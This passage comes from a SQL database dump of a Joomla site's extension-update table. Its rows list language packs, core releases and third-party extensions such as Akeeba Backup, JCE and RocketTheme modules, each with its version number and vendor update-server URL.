US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27416,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27417,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27418,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27419,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27420,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27421,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27422,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27423,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27424,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27425,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27426,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27427,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27428,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27429,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27430,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27431,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27432,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27433,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27434,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27435,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27436,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27437,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27438,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27439,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27440,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27441,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.3','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-3.html',''),(27442,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(27443,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-4.html',''),(27444,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',1,'4.8.4','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-4			\n		',''),(27445,129,0,'JCE 2.9.2','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.2','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-2-released',''),(27446,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27447,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27448,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27449,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27450,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27451,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27452,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27453,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27454,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27455,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27456,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27457,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27458,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27459,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27460,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27461,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27462,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27463,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27464,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27465,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27466,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27467,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27468,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27469,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27470,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27471,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27472,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27473,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27474,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27475,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27476,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27477,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27478,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27479,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27480,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27481,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27482,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-1.html',''),(27483,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27484,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27485,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27486,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27487,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27488,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27489,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27490,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27491,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27492,3,0,'French','','pkg_fr-FR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27493,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27494,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27495,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27496,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27497,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27498,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27499,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27500,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27501,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27502,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27503,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27504,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27505,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27506,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27507,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(27508,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27509,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27510,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27511,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27512,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27513,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27514,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27515,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27516,3,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27517,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27518,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27519,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27520,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27521,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27522,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27523,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27524,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27525,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27526,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27527,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27528,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27529,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27530,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27531,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27532,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27533,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27534,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27535,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27536,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27537,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27538,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27539,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27540,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27541,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27542,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(27543,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(27544,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(27545,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(27546,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(27547,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(27548,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(27549,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(27550,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(27551,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(27552,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27553,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27554,57,0,'French','','pkg_fr-FR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27555,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27556,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27557,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27558,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27559,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27560,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27561,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27562,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27563,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27564,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27565,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27566,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27567,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27568,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27569,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(27570,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27571,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27572,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27573,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27574,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27575,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27576,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27577,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27578,57,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27579,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27580,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27581,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27582,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27583,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27584,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27585,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27586,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27587,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27588,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27589,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27590,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27591,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27592,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27593,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27594,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27595,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27596,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27597,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27598,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27599,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27600,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27601,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27602,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27603,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27604,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'2.0.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/2-0-1.html',''),(27605,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(27607,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',1,'4.8.5','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-5			\n		',''),(27608,129,0,'JCE 2.9.3','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.3','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-3-released',''),(27609,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.2','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.2',''),(27610,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27611,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27612,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27613,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27614,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27615,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27616,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27617,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27618,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27619,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27620,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27621,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27622,67,0,'Akeeba Backup Core 